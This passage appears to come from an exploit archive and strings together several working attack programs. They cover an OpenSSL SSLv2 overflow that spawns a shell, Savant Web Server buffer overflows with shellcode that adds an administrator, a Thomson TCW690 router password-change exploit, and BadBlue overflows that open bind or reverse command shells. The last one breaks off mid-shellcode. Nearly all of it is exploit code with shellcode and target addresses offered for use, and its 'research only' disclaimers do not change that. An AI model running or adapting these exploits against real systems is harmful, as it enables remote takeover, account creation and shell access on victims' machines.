printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (len != 1 + CHALLENGE_LENGTH) {
printf("get server verify: Malformed packet size\n");
exit(1);
}
if (buf[0] != SSL2_MT_SERVER_VERIFY) {
printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n", (int)buf[0]);
exit(1);
}
if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) {
printf("get server verify: Challenge strings don't match\n");
exit(1);
}
}
void send_client_finished(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
buf[0] = SSL2_MT_CLIENT_FINISHED;
memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
}
void get_server_finished(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
int i;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (buf[0] != SSL2_MT_SERVER_FINISHED) {
printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n", (int)buf[0]);
exit(1);
}
if (len <= 112 /*17*/) {
printf("This server is not vulnerable to this attack.\n");
exit(1);
}
cipher = *(int*)&buf[101];
ciphers = *(int*)&buf[109];
printf("cipher: 0x%x ciphers: 0x%x\n", cipher, ciphers);
}
void get_server_error(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) {
printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]);
exit(1);
}
}
void usage(char* argv0)
{
int i;
printf(": Usage: %s target box [port] [-c N]\n\n", argv0);
printf(" target - supported box eg: 0x00\n");
printf(" box - hostname or IP address\n");
printf(" port - port for ssl connection\n");
printf(" -c open N connections. (use range 40-50 if u dont know)\n");
printf(" \n\n");
printf(" Supported OffSet:\n");
for (i=0; i<=MAX_ARCH; i++) {
printf("\t0x%02x - %s\n", i, architectures[i].desc);
}
printf("\n**** to all guys who like use lamah ddos. Read SRC to have no surprise\n");
exit(1);
}
int main(int argc, char* argv[])
{
char* host;
int port = 443;
int i;
int arch;
int N = 0;
ssl_conn* ssl1;
ssl_conn* ssl2;
printf("\n");
printf("************************************************** *****************\n");
printf("* Open**** v3.0.32-root priv8 by SPABAM based on openssl-too-open *\n");
printf("************************************************** *****************\n");
printf("* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *\n");
printf("* #hackarena irc.brasnet.org *\n");
printf("* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *\n");
printf("* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *\n");
printf("* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *\n");
printf("************************************************** *****************\n");
printf("\n");
if ((argc < 3) || (argc > 6))
usage(argv[0]);
sscanf(argv[1], "0x%x", &arch);
if ((arch < 0) || (arch > MAX_ARCH))
usage(argv[0]);
host = argv[2];
if (argc == 4)
port = atoi(argv[3]);
else if (argc == 5) {
if (strcmp(argv[3], "-c"))
usage(argv[0]);
N = atoi(argv[4]);
}
else if (argc == 6) {
port = atoi(argv[3]);
if (strcmp(argv[4], "-c"))
usage(argv[0]);
N = atoi(argv[5]);
}
srand(0x31337);
for (i=0; i<N; i++) {
printf("\rConnection... %d of %d", i+1, N);
fflush(stdout);
connect_host(host, port);
usleep(100000);
}
if (N) printf("\n");
printf("Establishing SSL connection\n");
ssl1 = ssl_connect_host(host, port);
ssl2 = ssl_connect_host(host, port);
send_client_hello(ssl1);
get_server_hello(ssl1);
send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1);
generate_session_keys(ssl1);
get_server_verify(ssl1);
send_client_finished(ssl1);
get_server_finished(ssl1);
printf("Ready to send shellcode\n");
port = get_local_port(ssl2->sock);
overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
*(int*)&overwrite_next_chunk[156] = cipher;
*(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
*(int*)&overwrite_next_chunk[196] = ciphers + 16; /* shellcode address */
send_client_hello(ssl2);
get_server_hello(ssl2);
send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1);
generate_session_keys(ssl2);
get_server_verify(ssl2);
for (i = 0; i < ssl2->conn_id_length; i++) {
ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
}
send_client_finished(ssl2);
get_server_error(ssl2);
printf("Spawning shell...\n");
sleep(1);
sh(ssl2->sock);
close(ssl2->sock);
close(ssl1->sock);
return 0;
}
/* spabam: It isn't 0day */
// [2003-04-04]
80 Savant Web Server 3.1 Remote Buffer Overflow Exploit
################################################## #######
# #
# Savant web server Buffer Overflow Exploit #
# Discovered by : Mati Aharoni #
# Coded by : Tal Zeltzer and Mati Aharoni #
# www.see-security.com #
# FOR RESEACRH PURPOSES ONLY! #
################################################## #######
import struct
import socket
sc = "\x90" * 21
# win32_adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub http://metasploit.com
sc += "\x31\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xd8"
sc += "\x23\x73\xe4\x83\xeb\xfc\xe2\xf4\x24\xcb\x35\xe4\x d8\x23\xf8\xa1"
sc += "\xe4\xa8\x0f\xe1\xa0\x22\x9c\x6f\x97\x3b\xf8\xbb\x f8\x22\x98\x07"
sc += "\xf6\x6a\xf8\xd0\x53\x22\x9d\xd5\x18\xba\xdf\x60\x 18\x57\x74\x25"
sc += "\x12\x2e\x72\x26\x33\xd7\x48\xb0\xfc\x27\x06\x07\x 53\x7c\x57\xe5"
sc += "\x33\x45\xf8\xe8\x93\xa8\x2c\xf8\xd9\xc8\xf8\xf8\x 53\x22\x98\x6d"
sc += "\x84\x07\x77\x27\xe9\xe3\x17\x6f\x98\x13\xf6\x24\x a0\x2c\xf8\xa4"
sc += "\xd4\xa8\x03\xf8\x75\xa8\x1b\xec\x31\x28\x73\xe4\x d8\xa8\x33\xd0"
sc += "\xdd\x5f\x73\xe4\xd8\xa8\x1b\xd8\x87\x12\x85\x84\x 8e\xc8\x7e\x8c"
sc += "\x37\xed\x93\x84\xb0\xbb\x8d\x6e\xd6\x74\x8c\x03\x 30\xcd\x8c\x1b"
sc += "\x27\x40\x1e\x80\xf6\x46\x0b\x81\xf8\x0c\x10\xc4\x b6\x46\x07\xc4"
sc += "\xad\x50\x16\x96\xf8\x7b\x53\x94\xaf\x47\x53\xcb\x 99\x67\x37\xc4"
sc += "\xfe\x05\x53\x8a\xbd\x57\x53\x88\xb7\x40\x12\x88\x bf\x51\x1c\x91"
sc += "\xa8\x03\x32\x80\xb5\x4a\x1d\x8d\xab\x57\x01\x85\x ac\x4c\x01\x97"
sc += "\xf8\x7b\x53\xcb\x99\x67\x37\xe4";
sc += "AA"
# Win2k SP0,1,2,3,4
#Change Return address as needed
buf = "\xEB\x19" + " /" + sc + struct.pack("<L",0x750236b2) + "\r\n\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(buf)
s.close()
# [2005-02-01]
80 Savant Web Server 3.1 Remote Buffer OverflowExploit (win2003)
#!/usr/bin/perl
#
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>savant.pl
#-h 127.0.0.1
#
#-=[ Savant Web Server 3.1 Remote Buffer Overflow Exploit ]=-
#-=[ ]=-
#-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-
#
#[+] Connect to 127.0.0.1
#[+] Using 00b7ead8 // Ret For Win2003
#[+] Sending Payload 258 byte
#[+] Creating Administrator User: User 'bug' Password 'hack'
#
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>net users
#
#Account utente per \\SERVER
# Added above info from http://x0n3-h4ck.org /str0ke #
################################################## ################################
#Savant Web Server 3.1 Remote Buffer Overflow Exploit #
# #
#This is exploit sending the 253 evil byte #
#the eip register the overwrite on 254 > 258 byte #
#exploit succefull created the Administrator User #
#in the server victim #
#Tested on win2003 server using ret 00b7ead8 #
# #
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>net users #
#Account utente per \\SERVER #
#------------------------------------------------------------------------------- #
#__vmware_user__ Administrator ASPNET #
#bug Guest SUPPORT_388945a0 #
#Esecuzione comando riuscita. #
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova> #
# #
#thanks to Mati Aharoni for discovered the bug #
# info: www.x0n3-h4ck.org#
################################################## ################################
use IO::Socket;
use Getopt::Std; getopts('h:', \%args);
if (defined($args{'h'})) { $host = $args{'h'}; }
print STDERR "\n-=[ Savant Web Server 3.1 Remote Buffer Overflow Exploit ]=-\n";
print STDERR "-=[ ]=-\n";
print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-\n\n";
if (!defined($host)) {
Usage();
}
$nop = "\x90"x13;
$ret= "\xd8\xea\xb7\x00";
my $shellcode =
"\x2b\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x09".
"\xb1\xc5\xbd\x83\xeb\xfc\xe2\xf4\xf5\x59\x83\xbd\x 09\xb1\x4e\xf8".
"\x35\x3a\xb9\xb8\x71\xb0\x2a\x36\x46\xa9\x4e\xe2\x 29\xb0\x2e\x5e".
"\x27\xf8\x4e\x89\x82\xb0\x2b\x8c\xc9\x28\x69\x39\x c9\xc5\xc2\x7c".
"\xc3\xbc\xc4\x7f\xe2\x45\xfe\xe9\x2d\xb5\xb0\x5e\x 82\xee\xe1\xbc".
"\xe2\xd7\x4e\xb1\x42\x3a\x9a\xa1\x08\x5a\x4e\xa1\x 82\xb0\x2e\x34".
"\x55\x95\xc1\x7e\x38\x71\xa1\x36\x49\x81\x40\x7d\x 71\xbe\x4e\xfd".
"\x05\x3a\xb5\xa1\xa4\x3a\xad\xb5\xe0\xba\xc5\xbd\x 09\x3a\x85\x89".
"\x0c\xcd\xc5\xbd\x09\x3a\xad\x81\x56\x80\x33\xdd\x 5f\x5a\xc8\xd5".
"\xf9\x3b\xc1\xe2\x61\x29\x3b\x37\x07\xe6\x3a\x5a\x e1\x5f\x3a\x42".
"\xf6\xd2\xa8\xd9\x27\xd4\xbd\xd8\x29\x9e\xa6\x9d\x 67\xd4\xb1\x9d".
"\x7c\xc2\xa0\xcf\x29\xd3\xb0\xda\x29\xd9\xa4\xde\x 62\x91\xea\xfc".
"\x4d\xf5\xe5\x9b\x2f\x91\xab\xd8\x7d\x91\xa9\xd2\x 6a\xd0\xa9\xda".
"\x7b\xde\xb0\xcd\x29\xf0\xa1\xd0\x60\xdf\xac\xce\x 7d\xc3\xa4\xc9".
"\x66\xc3\xb6\x9d\x6b\xc4\xa2\x9d\x26\xf0\x81\xf9\x 09\xb1\xc5\xbd";
print "[+] Connect to $host\n";
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 80,
Proto => 'tcp');
die unless $socket;
print "[+] Using 00b7ead8 // Ret For Win2003\n";
$buff = $nop.$shellcode.$ret;
print "[+] Sending Payload 258 byte\n";
$data = "GET /$buff \r\n\r\n";
send ($socket,$data,0);
print "[+] Creating Administrator User: User 'bug' Password 'hack'\n";
close;
sub Usage {
print STDERR "Usage:
-h Victim host.\n\n";
exit;
}
# [2005-02-04]
80 Savant Web Server 3.1 Remote BoF (French Win OS support)
################################################## #######
# #
# Savant web server Buffer Overflow Exploit #
# Discovered by : Mati Aharoni #
# Coded by : Tal Zeltzer and Mati Aharoni #
# www.see-security.com #
# FOR RESEACRH PURPOSES ONLY! #
# FRench Win OS support by Jerome Athias #
################################################## #######
import struct
import socket
sc = "\x90" * 21 #We need this number of nops
# win32_adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub http://metasploit.com
sc += "\x31\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xd8"
sc += "\x23\x73\xe4\x83\xeb\xfc\xe2\xf4\x24\xcb\x35\xe4\x d8\x23\xf8\xa1"
sc += "\xe4\xa8\x0f\xe1\xa0\x22\x9c\x6f\x97\x3b\xf8\xbb\x f8\x22\x98\x07"
sc += "\xf6\x6a\xf8\xd0\x53\x22\x9d\xd5\x18\xba\xdf\x60\x 18\x57\x74\x25"
sc += "\x12\x2e\x72\x26\x33\xd7\x48\xb0\xfc\x27\x06\x07\x 53\x7c\x57\xe5"
sc += "\x33\x45\xf8\xe8\x93\xa8\x2c\xf8\xd9\xc8\xf8\xf8\x 53\x22\x98\x6d"
sc += "\x84\x07\x77\x27\xe9\xe3\x17\x6f\x98\x13\xf6\x24\x a0\x2c\xf8\xa4"
sc += "\xd4\xa8\x03\xf8\x75\xa8\x1b\xec\x31\x28\x73\xe4\x d8\xa8\x33\xd0"
sc += "\xdd\x5f\x73\xe4\xd8\xa8\x1b\xd8\x87\x12\x85\x84\x 8e\xc8\x7e\x8c"
sc += "\x37\xed\x93\x84\xb0\xbb\x8d\x6e\xd6\x74\x8c\x03\x 30\xcd\x8c\x1b"
sc += "\x27\x40\x1e\x80\xf6\x46\x0b\x81\xf8\x0c\x10\xc4\x b6\x46\x07\xc4"
sc += "\xad\x50\x16\x96\xf8\x7b\x53\x94\xaf\x47\x53\xcb\x 99\x67\x37\xc4"
sc += "\xfe\x05\x53\x8a\xbd\x57\x53\x88\xb7\x40\x12\x88\x bf\x51\x1c\x91"
sc += "\xa8\x03\x32\x80\xb5\x4a\x1d\x8d\xab\x57\x01\x85\x ac\x4c\x01\x97"
sc += "\xf8\x7b\x53\xcb\x99\x67\x37\xe4";
sc += "AA"
# Win2k SP0,1,2,3,4 (US...)
#Change Return address as needed
#buf = "\xEB\x19" + " /" + sc + struct.pack("<L",0x750236b2) + "\r\n\r\n"
#0x74FA2AC4 pop esi - pop - ret ws2help.dll Win 2K SP4 FR (Found with findjmp2 by Class101 ;)
#buf = "\x90" * 24 + " /" + sc + struct.pack("<L",0x74fa2ac5) + "\r\n\r\n" #EB becomes CB...? so i changed it by nops
#Win XP SP2 FR?
#0x719E260D pop esi - pop - ret ws2help.dll Win XP SP2 FR (Found with findjmp2 by Class101 ;)
#buf = "\x90" * 24 + " /" + sc + struct.pack("<L",0x719e260e) + "\r\n\r\n" #EB becomes CB...? so i changed it by nops
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(buf)
s.close()
# [2005-02-15]
80 Thomson TCW690 POST Password Validation Exploit
/************************************************** ***************
* Thomson TCW690 POST Password Validation exploit
*
* Tested with hardware version 2.1 and software version ST42.03.0a
* Bug found by: MurDoK <murdok.lnx at gmail.com>
* Date: 02.19.2005
*
* sh-3.00$ gcc mdk_tcw690.c -o tcw690
* sh-3.00$ ./tcw690 192.168.0.1 123
* *****************************************
* Thomson TCW690 POST Password Validation
* Change password exploit coded by MurDoK
* *****************************************
*
* [1] Connecting...
* [2] Sending POST request...
* [3] Done! go to http://192.168.0.1
* sh-3.00$
*
* **** AUNA :/
************************************************** ****************/
#include <netdb.h>
int i=0, x=0, fd;
struct sockaddr_in sock;
struct hostent *he;
char badcode[1000] =
"POST /goform/RgSecurity HTTP/1.1\r\n"
"Connection: Keep-Alive\r\n"
"User-Agent: Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.4.28) KHTML/3.3.2 (like Gecko)\r\n"
"Referer: http://192.168.0.1/RgSecurity.asp\r\n"
"Pragma: no-cache\r\n"
"Cache-control: no-cache\r\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\r\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate\r\n"
"Accept-Charset: iso-8859-15, utf-8;q=0.5, *;q=0.5\r\n"
"Accept-Language: es, en\r\n"
"Host: 192.168.0.1\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Authorization: Basic\r\n"
"Content-Length: 62\r\n"
"\r\n";
//"Password=hack1&PasswordReEnter=hack1&RestoreFactoryNo=0x00";
int main(int argc, char *argv[]) {
// system("clear");
printf("*****************************************\n");
printf(" Thomson TCW690 POST Password Validation\n");
printf(" Change password exploit coded by MurDoK\n");
printf("*****************************************\n\n");
if(argc<3) {
printf("Usage: %s <router IP> <new_password>\n\n", argv[0]);
exit(1);
}
fd = socket(AF_INET, SOCK_STREAM, 0);
he = gethostbyname(argv[1]);
memset((char *) &sock, 0, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port=htons(80);
sock.sin_addr.s_addr=*((unsigned long*)he->h_addr);
printf("[1] Connecting... \n");
if ((connect(fd, (struct sockaddr *) &sock, sizeof(sock))) < 0) {
printf("ERROR: Can't connect to host!\n");
return 0;
}
strcat(badcode, "Password=");
strcat(badcode, argv[2]);
strcat(badcode, "&PasswordReEnter=");
strcat(badcode, argv[2]);
strcat(badcode, "&RestoreFactoryNo=0x00");
printf("[2] Sending POST request...\n");
write(fd, badcode, strlen(badcode));
printf("[3] Done! go to http://%s\n", argv[1]);
close(fd);
return 1;
}
// [2005-02-19]
80 BadBlue 2.5 Easy File Sharing Remote Buffer Overflow
/*
BadBlue, Easy File Sharing Remote BOverflow
Homepage: badblue.com
Affected version: v2.5 (2.60 and below not tested)
Patched version: v2.61
Link: badblue.com/bbs98.exe
Date: 27 February 2005
Application Risk: Severely High
Internet Risk: Low
Dicovery Credits: Andres Tarasco (atarasco _at_ sia.es)
Exploit Credits : class101 & metasploit.com
Hole History:
26-2-2005: BOF flaw published by Andres Tarasco of sia.es
27-2-2002: Hat-Squad.com releases an exploit
28-2-2005: haxorcitos releases a dupe with fake date :>
or you sux doing private stuffs.
Notes:
-6 bad chars, 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C, badly interpreted by
BadBlue
-using offsets from ext.dll, universal.
-use findjmp2 to quick search into ext.dll to see
if the offsets changes in the others BadBlue's versions below 2.5
-if you need the v2.5 for exploitation's pratices, get it on class101.org
-rename to .c for nux, haven't tested this one but it should works fine.
Greet:
Nima Majidi
Behrang Fouladi
Pejman
Hat-Squad.com
metasploit.com
A^C^E of addict3d.org
str0ke of enigmagroup.org
and my homy class101.org :>
*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
char scode[]=
/*XORed, I kiss metasploit.com because they are what means elite!*/
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\x03"
"\x7b\x5b\x13\x83\xee\xfc\xe2\xf4\xff\x11\xb0\x5c\x eb\x82\xa4\xec"
"\xfc\x1b\xd0\x7f\x27\x5f\xd0\x56\x3f\xf0\x27\x16\x 7b\x7a\xb4\x98"
"\x4c\x63\xd0\x4c\x23\x7a\xb0\xf0\x33\x32\xd0\x27\x 88\x7a\xb5\x22"
"\xc3\xe2\xf7\x97\xc3\x0f\x5c\xd2\xc9\x76\x5a\xd1\x e8\x8f\x60\x47"
"\x27\x53\x2e\xf0\x88\x24\x7f\x12\xe8\x1d\xd0\x1f\x 48\xf0\x04\x0f"
"\x02\x90\x58\x3f\x88\xf2\x37\x37\x1f\x1a\x98\x22\x c3\x1f\xd0\x53"
"\x33\xf0\x1b\x1f\x88\x0b\x47\xbe\x88\x3b\x53\x4d\x 6b\xf5\x15\x1d"
"\xef\x2b\xa4\xc5\x32\xa0\x3d\x40\x65\x13\x68\x21\x 6b\x0c\x28\x21"
"\x5c\x2f\xa4\xc3\x6b\xb0\xb6\xef\x38\x2b\xa4\xc5\x 5c\xf2\xbe\x75"
"\x82\x96\x53\x11\x56\x11\x59\xec\xd3\x13\x82\x1a\x f6\xd6\x0c\xec"
"\xd5\x28\x08\x40\x50\x28\x18\x40\x40\x28\xa4\xc3\x 65\x13\x5b\x76"
"\x65\x28\xd2\xf2\x96\x13\xff\x09\x73\xbc\x0c\xec\x d5\x11\x4b\x42"
"\x56\x84\x8b\x7b\xa7\xd6\x75\xfa\x54\x84\x8d\x40\x 56\x84\x8b\x7b"
"\xe6\x32\xdd\x5a\x54\x84\x8d\x43\x57\x2f\x0e\xec\x d3\xe8\x33\xf4"
"\x7a\xbd\x22\x44\xfc\xad\x0e\xec\xd3\x1d\x31\x77\x 65\x13\x38\x7e"
"\x8a\x9e\x31\x43\x5a\x52\x97\x9a\xe4\x11\x1f\x9a\x e1\x4a\x9b\xe0"
"\xa9\x85\x19\x3e\xfd\x39\x77\x80\x8e\x01\x63\xb8\x a8\xd0\x33\x61"
"\xfd\xc8\x4d\xec\x76\x3f\xa4\xc5\x58\x2c\x09\x42\x 52\x2a\x31\x12"
"\x52\x2a\x0e\x42\xfc\xab\x33\xbe\xda\x7e\x95\x40\x fc\xad\x31\xec"
"\xfc\x4c\xa4\xc3\x88\x2c\xa7\x90\xc7\x1f\xa4\xc5\x 51\x84\x8b\x7b"
"\xf3\xf1\x5f\x4c\x50\x84\x8d\xec\xd3\x7b\x5b\x13";
char payload[1024];
char ebx[]="\x05\x53\x02\x10"; /*call.ext.dll*/
char ebx2[]="\xB0\x55\x02\x10"; /*pop.pop.ret.ext.dll thx findjmp2 ;>*/
char pad[]="\xEB\x0C\x90\x90";
char pad2[]="\xE9\x05\xFE\xFF\xFF";
char EOL[]="\x0D\x0A\x0D\x0A";
char talk[]=
"\x47\x45\x54\x20\x2F\x65\x78\x74\x2E\x64\x6C\x6C\x 3F\x6D\x66\x63"
"\x69\x73\x61\x70\x69\x63\x6F\x6D\x6D\x61\x6E\x64\x 3D";
#ifdef WIN32
WSADATA wsadata;
#endif
void ver();
void usage(char* us);
int main(int argc,char *argv[])
{
ver();
unsigned long gip;
unsigned short gport;
char *target, *os;
if
(argc>6||argc<3||atoi(argv[1])>3||atoi(argv[1])<1){usage(argv[0]);return -1;
}
if (argc==5){usage(argv[0]);return -1;}
if (strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc==6)
{
if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
gip=inet_addr(argv[4])^(long)0x93939393;
gport=htons(atoi(argv[5]))^(short)0x9393;
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
gip=inet_addr(argv[4])^(ULONG)0x93939393;
gport=htons(atoi(argv[5]))^(USHORT)0x9393;
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=80;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1]) == 1){target=ebx;os="Win2k SP4 Server English\n[+] Win2k SP4 Pro. English\n[+] Win2k SP- - -";}
if (atoi(argv[1]) == 2){target=ebx2;os="WinXP SP2 Pro. English\n[+] WinXP SP1a Pro. English\n[+] WinXP SP- - -";}
if (atoi(argv[1]) == 3){target=ebx2;os="Win2003 SP4 Server English\n[+] Win2003 SP- - -";}
printf("[+] target(s): %s\n",os);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
if (argc==6){printf("[+] reverse mode disabled for this exploit\n");
printf("[+] get the source at class101.org and update yourself!\n");return -1;}
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
printf("[+] connected, constructing the payload...\n");
#ifdef WIN32
Sleep(1000);
#else
Sleep(1);
#endif
strcpy(payload,talk);
memset(payload+29,0x90,520);
if (atoi(argv[1]) == 1||atoi(argv[1]) == 2)
{
memcpy(payload+29+492,&pad,4);
memcpy(payload+521+4,target,4);
memcpy(payload+536+1,pad2,5);
}
else
{
memcpy(payload+29+485,&pad,4);
memcpy(payload+514+4,target,4);
memcpy(payload+529+1,pad2,5);
}
strcat(payload,EOL);
memcpy(payload+36+3,scode,strlen(scode));
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}
#ifdef WIN32
Sleep(2000);
#else
Sleep(2);
#endif
printf("[+] size of payload: %d\n",strlen(payload));
printf("[+] payload sent.\n");
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
void usage(char* us)
{
printf("USAGE:\n");
printf(" [+] . 101_bblu.exe Target VulnIP (bind mode)\n");
printf(" [+] . 101_bblu.exe Target VulnIP VulnPORT (bind mode)\n");
printf(" [+] . 101_bblu.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode)\n");
printf("TARGET: \n");
printf(" [+] 1. Win2k SP4 Server English (*)\n");
printf(" [+] 1. Win2k SP4 Pro English (*)\n");
printf(" [+] 1. Win2k SP- - - \n");
printf(" [+] 2. WinXP SP2 Pro. English \n");
printf(" [+] 2. WinXP SP1a Pro. English (*)\n");
printf(" [+] 2. WinXP SP- - - \n");
printf(" [+] 3. Win2k3 SP0 Server Italian (*)\n");
printf(" [+] 3. Win2k3 SP- - - \n");
printf("NOTE: \n");
printf(" The exploit bind a cmdshell port 101 or\n");
printf(" reverse a cmdshell on your listener.\n");
printf(" A wildcard (*) mean tested working, else, supposed working.\n");
printf(" A symbol (-) mean all.\n");
printf(" Compilation msvc6, cygwin, Linux.\n");
return;
}
void ver()
{
printf(" \n");
printf(" ================================================== =[0.1]=====\n");
printf(" ================BadBlue, Easy File Sharing 2.5===============\n");
printf(" ================ext.dll, Remote Stack Overflow===============\n");
printf(" ======coded by class101==================[Hat-Squad.com]=====\n");
printf(" =====================================[class101.org 2005]=====\n");
printf(" \n");
}
// [2005-02-27]
80 BadBlue 2.55 Web Server Remote Buffer Overflow
/* Badblue 2.55 Web Server remote buffer overflow
* ( Version: BadBlue Personal Edition v2.55 Date: Dec. 9, 2004 )
*
* Tested under Windows 2000 Professional SP3/SP4 Spanish
* Windows 2000 Server SP4 Spanish
* Windows XP SP1 Spanish
*
* Credits:
* Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability
* http://lists.netsys.com/pipermail/full-disclosure/2005-February/032029.html
*
* Exploit by : Miguel Tarascó Acuña
* Tarako AT Haxorcitos.com
* Exploit Date: 26/12/2004
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
* Greetings to: #haxorcitos, #dsr
*
************************************************** *************************
*
* D:\expl_badblue\Release>badblue.exe 192.168.1.82 80 1
*
* Badblue 2.55 Web Server - Remote buffer overflow
* Tarako AT Haxorcitos.com
*
* [i] Retrieving HTTP Server Header
* [i] Server : BadBlue/2.5
* [i] Connected : Yes
* [i] Target : Win2k Professional SP3/SP4 & Server SP4 (ext.dll)
* [i] Work : Complete
* [i] Now : telnet 192.168.1.82 9999
*
************************************************** *************************/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
#define TIMEOUT 1
#define VALIDSERVER "BadBlue/2.5"
#define GETHEADER "HEAD HTTP/1.1\r\n\r\n"
#define HTTPSEND1 "GET /ext.dll?mfcisapicommand="
#define HTTPSEND2 "&page=index.htx HTTP/1.1\n\
Accept: */*\n\
Accept-Language: es\n\
Accept-Encodin: gzip, deflate\n\
User-Agent: Haxorcitos/1.0 (compatible; MSIE 6.0; Windows NT 5.0)\n\
Host: "
#define HTTPSEND3 "\nConnection: Keep-Alive\r\n\r\n"
#define LEN 500
char shellcode[]=
"\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x 83\xC0\x11\x33"
"\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x 03\x64\x03\x7C"
"\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\x CE\x74\x77\xFE"
"\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\x CE\x4E\xE0\xBB"
"\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x 01\xCE\x70\x77"
"\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x 01\xCE\x5A\x77"
"\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x 01\xCE\x46\x77"
"\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x 01\xCE\x42\x77"
"\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x 01\xCE\x7C\x77"
"\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x 01\xCE\x78\x77"
"\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x 01\xCE\x64\x77"
"\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x 01\xCE\x60\x77"
